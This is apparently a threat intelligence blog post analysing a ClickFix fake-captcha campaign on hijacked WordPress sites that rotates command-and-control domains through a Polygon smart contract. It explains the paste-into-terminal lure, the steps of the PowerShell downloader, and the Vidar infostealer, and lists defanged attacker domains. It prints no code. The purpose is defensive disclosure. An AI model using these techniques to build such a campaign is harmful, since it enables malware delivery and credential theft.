The Secrets of Blockchain: ClickFix Utilizes Polygon for C2 Domain Distribution

ClickFix Uses Polygon Blockchain for C2 Domain Distribution

Author: Tadeáš Hájek, Whalebone Threat Intelligence Analyst
Contributor: Tomáš Čajko

Imagine this: you are visiting a familiar website to book a local photographer, check whether a nearby repair shop can replace your battery, or confirm the opening hours of your local pharmacy or restaurant.

The website displays a captcha. That alone does not seem unusual. But this captcha asks you to do something unexpected: open Windows Terminal, paste copied content, and press Enter.

Your guard may be down. After all, this is a website you have visited many times before. You may even know the owner personally. What could happen?

Between March and May, Whalebone Threat Intelligence observed a significant number of websites compromised with a FakeCaptcha/ClickFix variant. This variant presents visitors with a fraudulent Cloudflare “verify you are a human” page and prompts them to open Windows Terminal and paste content that has been inserted into their clipboard. If executed, the command downloads and installs malicious software capable of collecting and extracting sensitive information. 

Whalebone Threat Intelligence has also observed the cybercriminal actors behind these ClickFix compromises using the Polygon blockchain for command-and-control domain distribution. We identified a smart contract used to distribute new C2 domains (websites or servers used by cybercriminals to maintain communications with compromised systems) to hijacked sites. Between March and May, we observed 59 C2 domains, rotated on average every 22 hours and distributed through a single Polygon smart contract across hundreds of compromised websites.

This approach helps the attackers maintain access to working command-and-control infrastructure even as older domains are discovered, blocked, or taken down. By placing the domain distribution mechanism on the blockchain, the attackers add resilience to the operation and make disruption more difficult.

Technical Observations

The fraudulent captcha page is served as an external webpage embedded in the compromised page, so the address bar continues to show the legitimate site the visitor came to.

The lure ships with localised text in 57 languages, covering most European, Slavic, East Asian and Southeast Asian locales with right-to-left layout for Arabic and Hebrew, and walks the visitor through opening an elevated Windows Terminal (Win+X → I → Ctrl+V → Enter) so the payload executes with administrator privileges. The clipboard is written the moment the visitor ticks the "I am not a robot" checkbox.

The command written to the clipboard contains an encrypted PowerShell stage; on execution it decrypts itself and performs the following steps:

1. Forces TLS 1.2 for the subsequent HTTPS connection.
2. Creates a random directory under %LOCALAPPDATA%\Temp\<random>\.
3. Downloads an .exe with a random filename from the C2 server controlled by the attacker, retrying up to three times.
4. Executes the downloaded file hidden.
5. Attempts to delete the dropped .exe after launching it.

The exe file then performs steps consistent with public reports on the Vidar malware, which primarily functions as an infostealer: code designed to collect a variety of sensitive information, including account credentials and credit card details, from an infected computer and exfiltrate it to an attacker.

This modus operandi is consistent with previous reports on ClickFix/FakeCaptcha families. What caught our attention more was the frequent changes of C2 domains across the compromised websites. On analysis of the HTTP traffic of the hijacked website, we observed unusual connections to multiple public Polygon blockchain nodes:

Each request targeted a single Polygon smart contract, calling the getURL function. The eth_call method is a read-only way to query a contract without signing a transaction or paying gas. The response's result field contained an encoded string with the C2 domain in use at that moment, which then serves the ClickFix fake-CAPTCHA module.

Utilizing blockchain for C2 distribution presents significant benefits for the threat actor:

• Anonymity. Contract deployment and rotation require no registrar, no hoster, no KYC. The only identifier is a smart contract address.
• Availability. Once written on-chain, the data is replicated across nodes and is not removable through the channels defenders normally use against malicious infrastructure.
• Cheap, frictionless rotation. A single transaction (a few cents on Polygon) repoints the whole campaign to a new C2 host. No re-compromise of host sites is needed; the compromised website carries only a contract address and an RPC list.
• Resolution blends with legitimate Web3 traffic. Lookups go to public RPCs over eth_call, the same endpoints every wallet and dApp uses.

Yet, the same anonymity and availability that benefit the attacker also work in defenders' favour. Every rotation is a permanent, timestamped, public record and once a contract is identified, observers get retroactive visibility into every C2 the campaign has ever used, and a visibility into every future rotation. Blockchain analysis of the observed contract reveals the entire chain of C2 domains rotated throughout the campaign:

The earliest rotation transaction with a C2 domain embedded on this contract is dated 2026-03-29. Since then, 59 C2 domains have been observed, with an average time between switches of 22 hours. As of mid-May 2026, the contract continues to rotate.

The attacker prefers low-trust, low-cost TLDs (.cfd, .lol, .lat, .click, .mom, .cyou, .xyz) and does not appear to employ any pattern-like naming conventions. Some of the domain names point to a Russian-speaking operator, such as etomoidomen[.]cfd ("this is my domain"), nenadopapa[.]cfd ("don't, daddy") or denegnet[.]click ("no money"). In some instances they employ Russian vulgar slang, such as biggestchlen[.]lol, microchlen[.]lat, yanepidor[.]mom, pohuimne[.]lol or govnol[.]lat. And in other instances, the domain names are ordinary and unremarkable, such as yoshicity[.]xyz, bulletpop[.]cyou or marmelad[.]lat.

Across the hundreds of hijacked sites we have observed, there is no industry, no language, and no country the threat actor appears to favour. A single recent rotation reached a Dubai vehicle-rental business, a South African educational centre, a Brazilian maritime company, an Indonesian volunteering website and an Italian beauty parlour, among others. What they share is that every site we inspected was running WordPress. Once a vulnerable installation is compromised, the same ClickFix template is dropped, and that site joins the rotation along with every other.

Outlook

The practical recommendations are familiar but worth restating in this context. End users should treat any web page that asks them to open a terminal, paste a command, and press Enter as hostile, regardless of how trusted the host site appears. Site administrators should keep the core, plugins and themes patched, audit administrative accounts for unfamiliar additions, and review JavaScript injected into theme headers and footers.

For network defenders, the intervention point lies at the resolved C2 hostname. Both the fraudulent captcha and the downloaded malicious file are served from the C2, and reaching either requires a DNS lookup first. A DNS resolver with the right threat intelligence can refuse it before any connection is established.

The same mechanism that makes blockchain-based C2 distribution resilient against takedowns also makes the campaign legible to anyone willing to watch. Whalebone Threat Intelligence continues to monitor ClickFix/FakeCaptcha variants and protects our users against the intercepted threats.

Summary

• Attackers behind the ClickFix/FakeCaptcha campaign have begun distributing C2 domains via the Polygon blockchain.
• Between March and May 2026 we observed 59 C2 domains rotated on average every 22 hours, distributed via a single smart contract, across hundreds of compromised WordPress sites.
• The campaign targets end users, who are tricked by a fake Cloudflare CAPTCHA into running a PowerShell command, which downloads and runs infostealer malware.
• Using the blockchain means standard takedown routes (domain registrar, hosting provider) cannot address the distribution layer. The attacker switches to a new domain with a single transaction costing a few cents, with no need to re-compromise any site.

2025 Threat Landscape Report

Across the networks we protect, more than 30B threats were blocked last year. The way these threats evolved shows how quickly attackers are adapting.

Learn what shaped the cybersecurity landscape in 2025 and what lies ahead. Get a copy of our latest threat report.